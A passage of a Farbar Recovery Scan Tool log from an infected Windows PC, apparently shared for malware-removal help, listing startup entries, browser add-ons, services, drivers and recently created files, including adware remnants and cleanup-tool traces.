    HKU\S-1-5-21-1896049756-2371463424-3974721238-500\...\Run: [Chromium] => c:\users\administrator\appdata\local\chromium\application\chrome.exe [1068544 2016-03-18] (The Chromium Authors)
    HKU\S-1-5-21-1896049756-2371463424-3974721238-500\...\Run: [Interstatnogui] => C:\Users\Administrator\AppData\Roaming\Interstatnogui\interstatnogui.exe [4110848 2016-09-18] (Global surveys)
    ShellIconOverlayIdentifiers: [KzShlobj2] -> {AAA0C5B8-933F-4200-93AD-B143D7FFF9F3} => C:\Program Files (x86)\KuaiZip\X64\KZipShell.dll [2016-09-18] ()
    GroupPolicy: Restriction - Chrome <======= ATTENTION
    CHR HKLM\SOFTWARE\Policies\Google: Restriction <======= ATTENTION

    ==================== Internet (Whitelisted) ====================

    (If an item is included in the fixlist, if it is a registry item it will be removed or restored to default.)

    Tcpip\Parameters: [DhcpNameServer] 192.168.0.1 24.200.241.37 24.202.72.13
    Tcpip\..\Interfaces\{B4EC977B-3636-4217-8CA1-D8DE45EDD7B6}: [DhcpNameServer] 192.168.0.1 24.200.241.37 24.202.72.13
    Tcpip\..\Interfaces\{FE93FD32-9915-47D1-AB78-70D4CDC6F6D6}: [DhcpNameServer] 10.254.240.200 10.254.240.201

    Internet Explorer:
    ==================
    HKLM\SOFTWARE\Policies\Microsoft\Internet Explorer: Restriction <======= ATTENTION
    HKU\S-1-5-21-1896049756-2371463424-3974721238-500\SOFTWARE\Policies\Microsoft\Internet Explorer: Restriction <======= ATTENTION
    HKLM\Software\Microsoft\Internet Explorer\Main,Start Page = www.google.com
    HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Start Page = www.google.com
    HKU\.DEFAULT\Software\Microsoft\Internet Explorer\Main,Search Page = hxxp://www.microsoft.com/isapi/redir.dll?prd=ie&ar=iesearch
    HKU\.DEFAULT\Software\Microsoft\Internet Explorer\Main,Start Page = hxxp://www.microsoft.com/isapi/redir.dll?prd=ie&ar=msnhome
    HKU\S-1-5-21-1896049756-2371463424-3974721238-500\Software\Microsoft\Internet Explorer\Main,Search Page = hxxp://www.microsoft.com/isapi/redir.dll?prd=ie&ar=iesearch
    HKU\S-1-5-21-1896049756-2371463424-3974721238-500\Software\Microsoft\Internet Explorer\Main,Start Page = hxxp://www.cloudynights.com/page/index.html
    SearchScopes: HKLM -> DefaultScope {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL =
    SearchScopes: HKLM-x32 -> DefaultScope {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL =
    BHO: Lync Browser Helper -> {31D09BA0-12F5-4CCE-BE8A-2923E76605DA} -> C:\Program Files (x86)\Microsoft Office\root\VFS\ProgramFilesX64\Microsoft Office\Office16\OCHelper.dll [2016-09-05] (Microsoft Corporation)
    BHO: Icatti -> {7B6678FD-F9E3-46FD-aCF0-4C011573F737} -> C:\Program Files\Icatti\Orosbusf64.dll => No File
    BHO: Office Document Cache Handler -> {B4F3A835-0E21-4959-BA22-42B3008E02FF} -> C:\Program Files\Microsoft Office\Office14\URLREDIR.DLL [2013-03-06] (Microsoft Corporation)
    BHO: Microsoft OneDrive for Business Browser Helper -> {D0498E0A-45B7-42AE-A9AA-ABA463DBD3BF} -> C:\Program Files (x86)\Microsoft Office\root\VFS\ProgramFilesX64\Microsoft Office\Office16\GROOVEEX.DLL [2016-09-05] (Microsoft Corporation)
    BHO-x32: Lync Browser Helper -> {31D09BA0-12F5-4CCE-BE8A-2923E76605DA} -> C:\Program Files (x86)\Microsoft Office\root\Office16\OCHelper.dll [2016-09-05] (Microsoft Corporation)
    BHO-x32: Office Document Cache Handler -> {B4F3A835-0E21-4959-BA22-42B3008E02FF} -> C:\Program Files (x86)\Microsoft Office\Office14\URLREDIR.DLL [2013-03-06] (Microsoft Corporation)
    BHO-x32: Microsoft OneDrive for Business Browser Helper -> {D0498E0A-45B7-42AE-A9AA-ABA463DBD3BF} -> C:\Program Files (x86)\Microsoft Office\root\Office16\GROOVEEX.DLL [2016-09-05] (Microsoft Corporation)
    Handler-x32: mso-minsb-roaming.16 - {83C25742-A9F7-49FB-9138-434302C88D07} - C:\Program Files (x86)\Microsoft Office\root\Office16\MSOSB.DLL [2016-09-05] (Microsoft Corporation)
    Handler-x32: mso-minsb.16 - {42089D2D-912D-4018-9087-2B87803E93FB} - C:\Program Files (x86)\Microsoft Office\root\Office16\MSOSB.DLL [2016-09-05] (Microsoft Corporation)
    Handler-x32: osf-roaming.16 - {42089D2D-912D-4018-9087-2B87803E93FB} - C:\Program Files (x86)\Microsoft Office\root\Office16\MSOSB.DLL [2016-09-05] (Microsoft Corporation)
    Handler-x32: osf.16 - {5504BE45-A83B-4808-900A-3A5C36E7F77A} - C:\Program Files (x86)\Microsoft Office\root\Office16\MSOSB.DLL [2016-09-05] (Microsoft Corporation)

    FireFox:
    ========
    FF ProfilePath: C:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\jruxmgi6.default
    FF DefaultSearchEngine: Search Module
    FF SelectedSearchEngine: Search Module
    FF Plugin: @microsoft.com/GENUINE -> disabled [No File]
    FF Plugin: @microsoft.com/OfficeAuthz,version=14.0 -> C:\PROGRA~1\MICROS~2\Office14\NPAUTHZ.DLL [2010-01-09] (Microsoft Corporation)
    FF Plugin-x32: @microsoft.com/GENUINE -> disabled [No File]
    FF Plugin-x32: @microsoft.com/Lync,version=15.0 -> C:\Program Files (x86)\Microsoft Office\root\VFS\ProgramFilesX86\Mozilla Firefox\plugins\npmeetingjoinpluginoc.dll [2016-09-05] (Microsoft Corporation)
    FF Plugin-x32: @microsoft.com/OfficeAuthz,version=14.0 -> C:\PROGRA~2\MICROS~1\Office14\NPAUTHZ.DLL [2010-01-09] (Microsoft Corporation)
    FF Plugin-x32: @microsoft.com/SharePoint,version=14.0 -> C:\Program Files (x86)\Microsoft Office\root\Office16\NPSPWRAP.DLL [2016-09-05] (Microsoft Corporation)
    FF Plugin-x32: @videolan.org/vlc,version=2.1.3 -> C:\Program Files (x86)\VideoLAN\VLC\npvlc.dll [2014-02-04] (VideoLAN)
    FF Extension: (Firefox Hotfix) - C:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\jruxmgi6.default\Extensions\firefox-hotfix@mozilla.org.xpi [2016-09-19]
    FF Extension: (Video DownloadHelper) - C:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\jruxmgi6.default\Extensions\{b9db16a4-6edc-47ec-a1f4-b86292ed211d}.xpi [2016-09-16]

    ==================== Services (Whitelisted) ========================

    (If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

    R2 !SASCORE; C:\Program Files\SUPERAntiSpyware\SASCORE64.EXE [172344 2014-07-22] (SUPERAntiSpyware.com)
    R2 ClickToRunSvc; C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe [2980032 2016-09-05] (Microsoft Corporation)
    R2 MBAMScheduler; C:\Program Files (x86)\Malwarebytes Anti-Malware\mbamscheduler.exe [1514464 2016-03-10] (Malwarebytes)
    R2 MBAMService; C:\Program Files (x86)\Malwarebytes Anti-Malware\mbamservice.exe [1136608 2016-03-10] (Malwarebytes)
    S3 WinDefend; C:\Program Files\Windows Defender\mpsvc.dll [1011712 2013-05-27] (Microsoft Corporation)

    ===================== Drivers (Whitelisted) ==========================

    (If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

    S3 atmeltpm; C:\Windows\system32\drivers\atmeltpm64.sys [19456 2012-05-25] (Atmel, Inc.)
    S3 BCMTPM; C:\Windows\system32\drivers\btpmwx64.sys [32096 2012-05-25] (Broadcom Corp.)
    S3 d554gps; C:\Windows\system32\drivers\d554gps64.sys [102440 2012-06-18] (Ericsson AB)
    S3 ebdrv; C:\Windows\system32\drivers\evbda.sys [3286016 2009-06-10] (Broadcom Corporation)
    S3 ecnssndis; C:\Windows\System32\Drivers\wwuss64.sys [26664 2012-06-18] (Ericsson AB)
    S3 ecnssndisfltr; C:\Windows\System32\Drivers\wwussf64.sys [29736 2012-06-18] (Ericsson AB)
    R3 MBAMProtector; C:\WINDOWS\system32\drivers\mbam.sys [27008 2016-03-10] (Malwarebytes)
    R3 MBAMSwissArmy; C:\WINDOWS\system32\drivers\MBAMSwissArmy.sys [192216 2016-09-19] (Malwarebytes)
    R3 MBAMWebAccessControl; C:\WINDOWS\system32\drivers\mwac.sys [64896 2016-03-10] (Malwarebytes Corporation)
    S3 Mbm3CBus; C:\Windows\system32\drivers\Mbm3CBus.sys [419400 2012-06-18] (MCCI Corporation)
    S3 Mbm3DevMt; C:\Windows\system32\drivers\Mbm3DevMt.sys [430664 2012-06-18] (MCCI Corporation)
    S3 nwdelgobi3kfilter; C:\Windows\system32\drivers\nwdelgobi3kfilter.sys [34304 2012-11-06] (Novatel Wireless Inc)
    S3 NWDellPort; C:\Windows\system32\drivers\nwdelser.sys [222208 2012-11-06] (Novatel Wireless Inc.)
    S3 NWDellPort2; C:\Windows\system32\drivers\nwdelser2.sys [222208 2012-11-06] (Novatel Wireless Inc.)
    S3 nwdelserial; C:\Windows\system32\drivers\nwdelserial.sys [234112 2012-11-06] (Novatel Wireless Inc.)
    S3 qcfilterdl2k; C:\Windows\system32\drivers\qcfilterdl2k.sys [6400 2012-07-05] (QUALCOMM Incorporated)
    S3 qcombusdl; C:\Windows\system32\drivers\qcombusdl.sys [137800 2012-07-05] (MCCI)
    S3 qcusbserdl2k; C:\Windows\system32\drivers\qcusbserdl2k.sys [230784 2012-07-05] (QUALCOMM Incorporated)
    R1 SASDIFSV; C:\Program Files\SUPERAntiSpyware\SASDIFSV64.SYS [14928 2011-07-22] (SUPERAdBlocker.com and SUPERAntiSpyware.com)
    R1 SASKUTIL; C:\Program Files\SUPERAntiSpyware\SASKUTIL64.SYS [12368 2011-07-12] (SUPERAdBlocker.com and SUPERAntiSpyware.com)
    S3 stmtpm; C:\Windows\system32\drivers\stm_tpm.sys [29184 2012-05-25] (STMicroelectronics, INC)
    R3 ST_ACCEL; C:\Windows\System32\DRIVERS\ST_ACCEL.sys [68208 2012-11-06] (STMicroelectronics)
    S3 tcm; C:\Windows\system32\drivers\tcm.sys [17048 2012-07-04] ()
    U3 TrueSight; C:\Windows\System32\drivers\TrueSight.sys [28272 2016-09-18] ()
    S3 catchme; \??\C:\ComboFix\catchme.sys [X]

    ==================== NetSvcs (Whitelisted) ===================

    (If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

    NETSVCx32: HpSvc -> no filepath.

    ==================== One Month Created files and folders ========

    (If an entry is included in the fixlist, the file/folder will be moved.)

    2016-09-19 03:11 - 2016-09-19 03:11 - 00036789 _____ C:\ComboFix.txt
    2016-09-19 03:08 - 2016-09-19 03:08 - 00000000 ____D C:\Users\Administrator\AppData\Local\CrashRpt
    2016-09-18 22:20 - 2016-09-19 03:12 - 00000000 ____D C:\ComboFix
    2016-09-18 22:20 - 2016-09-18 21:38 - 05658813 ____R (Swearware) C:\Users\Administrator\Desktop\ComboFix.exe
    2016-09-18 21:39 - 2016-09-19 03:11 - 00000000 ____D C:\Qoobox
    2016-09-18 21:39 - 2011-06-26 02:45 - 00256000 _____ C:\WINDOWS\PEV.exe
    2016-09-18 21:39 - 2010-11-07 13:20 - 00208896 _____ C:\WINDOWS\MBR.exe
    2016-09-18 21:39 - 2009-04-20 00:56 - 00060416 _____ (NirSoft) C:\WINDOWS\NIRCMD.exe
    2016-09-18 21:39 - 2000-08-30 20:00 - 00518144 _____ (SteelWerX) C:\WINDOWS\SWREG.exe
    2016-09-18 21:39 - 2000-08-30 20:00 - 00406528 _____ (SteelWerX) C:\WINDOWS\SWSC.exe
    2016-09-18 21:39 - 2000-08-30 20:00 - 00098816 _____ C:\WINDOWS\sed.exe
    2016-09-18 21:39 - 2000-08-30 20:00 - 00080412 _____ C:\WINDOWS\grep.exe
    2016-09-18 21:39 - 2000-08-30 20:00 - 00068096 _____ C:\WINDOWS\zip.exe
    2016-09-18 21:38 - 2016-09-19 03:10 - 00000000 ____D C:\WINDOWS\erdnt
    2016-09-18 21:38 - 2016-09-18 21:38 - 05658813 ____R (Swearware) C:\Users\Administrator\Downloads\ComboFix.exe
    2016-09-18 21:09 - 2016-09-18 21:09 - 00006874 _____ C:\Users\Administrator\Desktop\JRT.txt
    2016-09-18 21:07 - 2016-09-18 21:07 - 00000000 ____D C:\Users\Administrator\AppData\Roaming\KuaiZip
    2016-09-18 20:56 - 2016-09-18 21:02 - 00000000 ____D C:\AdwCleaner
    2016-09-18 20:51 - 2016-09-18 20:51 - 00165985 _____ C:\malware scan log1.txt
    2016-09-18 20:38 - 2016-09-18 20:38 - 00006960 _____ C:\mwbits.txt
    2016-09-18 20:15 - 2016-09-18 20:58 - 00000000 ____D C:\Users\Administrator\AppData\Local\CrashDumps
    2016-09-18 20:09 - 2016-09-19 18:41 - 00192216 _____ (Malwarebytes) C:\WINDOWS\system32\Drivers\MBAMSwissArmy.sys
    2016-09-18 20:09 - 2016-09-18 21:00 - 00000000 ____D C:\Program Files (x86)\KuaiZip
    2016-09-18 20:09 - 2016-09-18 20:43 - 00001102 _____ C:\Users\Public\Desktop\Malwarebytes Anti-Malware.lnk
    2016-09-18 20:09 - 2016-09-18 20:09 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Malwarebytes Anti-Malware
    2016-09-18 20:09 - 2016-09-18 20:09 - 00000000 ____D C:\ProgramData\Malwarebytes
    2016-09-18 20:09 - 2016-09-18 20:09 - 00000000 ____D C:\Program Files (x86)\Malwarebytes Anti-Malware
    2016-09-18 20:09 - 2016-03-10 14:09 - 00064896 _____ (Malwarebytes Corporation) C:\WINDOWS\system32\Drivers\mwac.sys
    2016-09-18 20:09 - 2016-03-10 14:08 - 00140672 _____ (Malwarebytes) C:\WINDOWS\system32\Drivers\mbamchameleon.sys
    2016-09-18 20:09 - 2016-03-10 14:08 - 00027008 _____ (Malwarebytes) C:\WINDOWS\system32\Drivers\mbam.sys
    2016-09-18 20:05 - 2016-09-18 20:05 - 00144744 _____ C:\Users\Administrator\Documents\RKreport E446.tmp.txt
    2016-09-18 19:22 - 2016-09-18 19:22 - 00028272 _____ C:\WINDOWS\system32\Drivers\TrueSight.sys
    2016-09-18 19:21 - 2016-09-18 20:43 - 00000902 _____ C:\Users\Public\Desktop\RogueKiller.lnk
    2016-09-18 19:21 - 2016-09-18 19:21 - 00000000 ____D C:\ProgramData\RogueKiller
    2016-09-18 19:21 - 2016-09-18 19:21 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\RogueKiller
    2016-09-18 19:21 - 2016-09-18 19:21 - 00000000 ____D C:\Program Files\RogueKiller
    2016-09-18 19:02 - 2016-09-18 19:03 - 01610560 _____ (Malwarebytes) C:\Users\Administrator\Downloads\JRT.exe
    2016-09-18 19:02 - 2016-09-18 19:02 - 03861056 _____ C:\Users\Administrator\Downloads\adwcleaner_6.020.exe
    2016-09-18 19:01 - 2016-09-18 19:02 - 22851472 _____ (Malwarebytes ) C:\Users\Administrator\Downloads\mbam-setup-2.2.1.1043.exe
    2016-09-18 18:59 - 2016-09-18 19:00 - 33565440 _____ (Adlice Software ) C:\Users\Administrator\Downloads\setup.exe
    2016-09-18 11:58 - 2016-09-18 11:58 - 00028081 _____ C:\Users\Administrator\Downloads\Addition.txt
    2016-09-18 11:57 - 2016-09-19 20:30 - 00012282 _____ C:\Users\Administrator\Downloads\FRST.txt
    2016-09-18 11:57 - 2016-09-19 20:30 - 00000000 ____D C:\FRST
    2016-09-18 11:57 - 2016-09-18 11:57 - 02399232 _____ (Farbar) C:\Users\Administrator\Downloads\FRST64.exe
    2016-09-18 11:05 - 2016-09-18 11:09 - 00172700 _____ C:\WINDOWS\ntbtlog.txt
    2016-09-18 10:49 - 2016-09-18 10:50 - 49521912 _____ (www.ludashi.com) C:\Users\Administrator\Downloads\ludashisetup.exe
    2016-09-18 10:48 - 2016-09-18 20:43 - 00001153 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Mozilla Firefox.lnk
    2016-09-18 10:48 - 2016-09-18 20:43 - 00001147 _____ C:\Users\Public\Desktop\Mozilla Firefox.lnk
    2016-09-18 10:48 - 2016-09-18 10:48 - 00000000 ____D C:\Program Files (x86)\Mozilla Maintenance Service
    2016-09-18 10:48 - 2016-09-18 10:48 - 00000000 ____D C:\Program Files (x86)\Mozilla Firefox
    2016-09-18 09:15 - 2016-09-18 09:15 - 00003110 _____ C:\WINDOWS\System32\Tasks\{AC769F71-F24C-4982-9CD9-2399739747D0}
    2016-09-18 09:09 - 2016-09-18 09:09 - 00003120 _____ C:\WINDOWS\System32\Tasks\{9CBDDEFC-08B0-4505-B272-4C0259D93CAD}
    2016-09-18 09:09 - 2016-09-18 09:09 - 00000000 ____D C:\WINDOWS\system32\appmgmt
    2016-09-18 09:08 - 2016-09-18 09:08 - 00003586 _____ C:\WINDOWS\System32\Tasks\{C7D820FC-CDAB-40D6-BEDE-D25C4C86FE7F}
    2016-09-18 09:08 - 2016-09-18 09:08 - 00003106 _____ C:\WINDOWS\System32\Tasks\{5E89D5D4-C91B-4F37-AF11-F0CBE417CCC0}
    2016-09-18 09:06 - 2016-09-18 09:06 - 00003594 _____ C:\WINDOWS\System32\Tasks\{E2E7A15A-991B-470C-85A5-CFECBCB02080}
    2016-09-18 08:49 - 2016-09-18 08:49 - 00000000 ____D C:\WINDOWS\system32\guu
    2016-09-18 08:05 - 2016-09-18 09:57 - 00000000 ____D C:\Program Files (x86)\LuDaShib
    2016-09-18 08:05 - 2016-09-18 08:05 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\鲁大师
    2016-09-18 08:04 - 2016-09-18 08:50 - 00000000 ____D C:\Program Files\nplusb
    2016-09-18 08:03 - 2016-09-18 09:49 - 00000000 ____D C:\Program Files (x86)\KuaiZipb
    2016-09-18 08:03 - 2016-09-18 08:04 - 07090176 _____ C:\Users\Administrator\AppData\Roaming\agent.dat
    2016-09-18 08:03 - 2016-09-18 08:04 - 00018432 _____ C:\Users\Administrator\AppData\Roaming\Main.dat
    2016-09-18 08:03 - 2016-09-18 08:03 - 00000000 ____D C:\Users\Administrator\AppData\Local\A
    2016-09-18 08:01 - 2016-09-18 20:37 - 00000000 ____D C:\Users\Administrator\AppData\Roaming\Gajedefsim
    2016-09-18 08:01 - 2016-09-18 20:37 - 00000000 ____D C:\Program Files (x86)\hostb
    2016-09-18 08:01 - 2016-09-18 08:48 - 00000000 ____D C:\Program Files\IcattiUnb
    2016-09-18 08:01 - 2016-09-18 08:01 - 00140288 _____ C:\Users\Administrator\AppData\Roaming\Installer.dat
    2016-09-18 08:01 - 2016-09-18 08:01 - 00000000 ____D C:\Users\Administrator\AppData\Local\Tempfolder
    2016-09-18 07:59 - 2016-09-18 20:37 - 00000000 ____D C:\Program Files\Casterb
    2016-09-18 07:59 - 2016-09-18 20:37 - 00000000 ____D C:\Program Files (x86)\DPowerb
    2016-09-18 07:58 - 2016-09-18 20:37 - 00000000 ____D C:\Users\Administrator\AppData\Local\Apps\2.0
    2016-09-18 07:58 - 2016-09-18 20:37 - 00000000 ____D C:\Program Files (x86)\EasyHotspotb
    2016-09-18 07:56 - 2016-09-18 07:56 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Youtube Downloader
    2016-09-18 07:55 - 2016-09-18 07:56 - 00000000 ____D C:\Users\Administrator\AppData\Roaming\Interstatnogui
    2016-09-18 06:33 - 2016-09-18 06:33 - 00000000 ____D C:\Users\Default\AppData\Local\Microsoft Help
    2016-09-18 06:33 - 2016-09-18 06:33 - 00000000 ____D C:\Users\Default User\AppData\Local\Microsoft Help
    2016-09-16 21:23 - 2016-09-16 21:25 - 00000000 ____D C:\WINDOWS\system32\MRT
    2016-09-16 21:23 - 2016-09-16 21:23 - 144199024 ____C (Microsoft Corporation) C:\WINDOWS\system32\MRT.exe
    2016-09-16 21:12 - 2016-09-18 08:50 - 00000000 ____D C:\SUPERDelete
    2016-09-16 18:49 - 2016-09-16 18:50 - 40326904 _____ C:\Users\Administrator\Downloads\Firefox_Setup.exe
    2016-09-16 18:46 - 2016-09-16 18:46 - 00985288 _____ (Slimware Utilities Holdings, Inc.) C:\Users\Administrator\Downloads\DriverUpdate-setup.exe
    2016-09-16 10:46 - 2016-09-16 11:05 - 00000000 ____D C:\aa Canon 450D Master acum
    2016-09-16 10:41 - 2016-09-16 10:41 - 00000000 ____D C:\WINDOWS\PCHEALTH
    2016-09-16 10:41 - 2016-09-16 10:41 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\SharePoint
    2016-09-16 10:41 - 2016-09-16 10:41 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Microsoft Office
    2016-09-16 10:41 - 2016-09-16 10:41 - 00000000 ____D C:\Program Files (x86)\Microsoft Visual Studio 8
    2016-09-16 10:39 - 2016-09-16 10:39 - 00000000 ___RD C:\MSOCache
    2016-09-16 10:39 - 2016-09-16 10:39 - 00000000 ____D C:\Users\Administrator\AppData\Local\Microsoft Help
    2016-09-16 10:39 - 2016-09-16 10:39 - 00000000 ____D C:\Program Files\Microsoft Office
    2016-09-16 10:34 - 2016-09-16 10:35 - 266433120 _____ (Microsoft Corporation) C:\Users\Administrator\Downloads\SharePointDesigner.exe
    2016-09-14 01:10 - 2016-09-01 15:26 - 00394440 _____ (Microsoft Corporation) C:\WINDOWS\system32\iedkcs32.dll
    2016-09-14 01:10 - 2016-09-01 14:41 - 00346320 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\iedkcs32.dll
    2016-09-14 01:10 - 2016-08-31 23:18 - 02724864 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mshtml.tlb
    2016-09-14 01:10 - 2016-08-31 23:08 - 20312064 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mshtml.dll
    2016-09-14 01:10 - 2016-08-31 22:48 - 00062464 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\iesetup.dll
    2016-09-14 01:10 - 2016-08-31 22:46 - 00498688 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\vbscript.dll
    2016-09-14 01:10 - 2016-08-31 22:46 - 00341504 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\html.iec
    2016-09-14 01:10 - 2016-08-31 22:46 - 00047616 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\ieetwproxystub.dll
    2016-09-14 01:10 - 2016-08-31 22:44 - 00064000 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\MshtmlDac.dll
    2016-09-14 01:10 - 2016-08-31 22:34 - 02286592 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\iertutil.dll
    2016-09-14 01:10 - 2016-08-31 22:31 - 00047104 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\jsproxy.dll
    2016-09-14 01:10 - 2016-08-31 22:31 - 00030720 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\iernonce.dll
    2016-09-14 01:10 - 2016-08-31 22:26 - 00476160 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\ieui.dll
    2016-09-14 01:10 - 2016-08-31 22:24 - 00663552 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\jscript.dll
    2016-09-14 01:10 - 2016-08-31 22:24 - 00115712 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\ieUnatt.exe
    2016-09-14 01:10 - 2016-08-31 22:23 - 00620032 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\jscript9diag.dll
    2016-09-14 01:10 - 2016-08-31 22:08 - 00416256 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\dxtmsft.dll
    2016-09-14 01:10 - 2016-08-31 21:59 - 00060416 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\JavaScriptCollectionAgent.dll
    2016-09-14 01:10 - 2016-08-31 21:57 - 00091136 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\inseng.dll
    2016-09-14 01:10 - 2016-08-31 21:53 - 00168960 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\msrating.dll
    2016-09-14 01:10 - 2016-08-31 21:52 - 00076288 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mshtmled.dll
    2016-09-14 01:10 - 2016-08-31 21:48 - 00279040 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\dxtrans.dll
    2016-09-14 01:10 - 2016-08-31 21:45 - 00130048 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\occache.dll
    2016-09-14 01:10 - 2016-08-31 21:34 - 00230400 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\webcheck.dll
    2016-09-14 01:10 - 2016-08-31 21:30 - 00692736 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\msfeeds.dll
    2016-09-14 01:10 - 2016-08-31 21:29 - 02055680 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\inetcpl.cpl
    2016-09-14 01:10 - 2016-08-31 21:29 - 01155072 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mshtmlmedia.dll
    2016-09-14 01:10 - 2016-08-31 21:27 - 13808128 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\ieframe.dll
    2016-09-14 01:10 - 2016-08-31 21:24 - 04607488 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\jscript9.dll
    2016-09-14 01:10 - 2016-08-31 20:45 - 25770496 _____ (Microsoft Corporation) C:\WINDOWS\system32\mshtml.dll
    2016-09-14 01:10 - 2016-08-31 20:43 - 02445824 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\wininet.dll
    2016-09-14 01:10 - 2016-08-31 20:42 - 00710144 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\ieapfltr.dll
    2016-09-14 01:10 - 2016-08-31 20:40 - 02724864 _____ (Microsoft Corporation) C:\WINDOWS\system32\mshtml.tlb
    2016-09-14 01:10 - 2016-08-31 20:40 - 00004096 _____ (Microsoft Corporation) C:\WINDOWS\system32\ieetwcollectorres.dll
    2016-09-14 01:10 - 2016-08-31 20:38 - 01316352 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\urlmon.dll
    2016-09-14 01:10 - 2016-08-31 20:25 - 00066560 _____ (Microsoft Corporation) C:\WINDOWS\system32\iesetup.dll
    2016-09-14 01:10 - 2016-08-31 20:24 - 02894336 _____ (Microsoft Corporation) C:\WINDOWS\system32\iertutil.dll
    2016-09-14 01:10 - 2016-08-31 20:24 - 00576000 _____ (Microsoft Corporation) C:\WINDOWS\system32\vbscript.dll
    2016-09-14 01:10 - 2016-08-31 20:24 - 00417792 _____ (Microsoft Corporation) C:\WINDOWS\system32\html.iec
    2016-09-14 01:10 - 2016-08-31 20:24 - 00088064 _____ (Microsoft Corporation) C:\WINDOWS\system32\MshtmlDac.dll
    2016-09-14 01:10 - 2016-08-31 20:24 - 00048640 _____ (Microsoft Corporation) C:\WINDOWS\system32\ieetwproxystub.dll
    2016-09-14 01:10 - 2016-08-31 20:16 - 00054784 _____ (Microsoft Corporation) C:\WINDOWS\system32\jsproxy.dll
    2016-09-14 01:10 - 2016-08-31 20:15 - 00034304 _____ (Microsoft Corporation) C:\WINDOWS\system32\iernonce.dll
    2016-09-14 01:10 - 2016-08-31 20:12 - 00615936 _____ (Microsoft Corporation) C:\WINDOWS\system32\ieui.dll
    2016-09-14 01:10 - 2016-08-31 20:11 - 00144384 _____ (Microsoft Corporation) C:\WINDOWS\system32\ieUnatt.exe
    2016-09-14 01:10 - 2016-08-31 20:11 - 00114688 _____ (Microsoft Corporation) C:\WINDOWS\system32\ieetwcollector.exe
    2016-09-14 01:10 - 2016-08-31 20:10 - 00817664 _____ (Microsoft Corporation) C:\WINDOWS\system32\jscript.dll
    2016-09-14 01:10 - 2016-08-31 20:10 - 00814080 _____ (Microsoft Corporation) C:\WINDOWS\system32\jscript9diag.dll
    2016-09-14 01:10 - 2016-08-31 20:06 - 06047232 _____ (Microsoft Corporation) C:\WINDOWS\system32\jscript9.dll
    2016-09-14 01:10 - 2016-08-31 20:03 - 00968704 _____ (Microsoft Corporation) C:\WINDOWS\system32\MsSpellCheckingFacility.exe
    2016-09-14 01:10 - 2016-08-31 19:59 - 00489984 _____ (Microsoft Corporation) C:\WINDOWS\system32\dxtmsft.dll
    2016-09-14 01:10 - 2016-08-31 19:51 - 00077824 _____ (Microsoft Corporation) C:\WINDOWS\system32\JavaScriptCollectionAgent.dll
    2016-09-14 01:10 - 2016-08-31 19:50 - 00107520 _____ (Microsoft Corporation) C:\WINDOWS\system32\inseng.dll
    2016-09-14 01:10 - 2016-08-31 19:47 - 00199680 _____ (Microsoft Corporation) C:\WINDOWS\system32\msrating.dll
    2016-09-14 01:10 - 2016-08-31 19:46 - 00092160 _____ (Microsoft Corporation) C:\WINDOWS\system32\mshtmled.dll
    2016-09-14 01:10 - 2016-08-31 19:44 - 00315392 _____ (Microsoft Corporation) C:\WINDOWS\system32\dxtrans.dll
    2016-09-14 01:10 - 2016-08-31 19:42 - 00152064 _____ (Microsoft Corporation) C:\WINDOWS\system32\occache.dll
    2016-09-14 01:10 - 2016-08-31 19:31 - 00262144 _____ (Microsoft Corporation) C:\WINDOWS\system32\webcheck.dll
    2016-09-14 01:10 - 2016-08-31 19:29 - 00724992 _____ (Microsoft Corporation) C:\WINDOWS\system32\ie4uinit.exe
    2016-09-14 01:10 - 2016-08-31 19:28 - 00806400 _____ (Microsoft Corporation) C:\WINDOWS\system32\msfeeds.dll
    2016-09-14 01:10 - 2016-08-31 19:27 - 01359360 _____ (Microsoft Corporation) C:\WINDOWS\system32\mshtmlmedia.dll
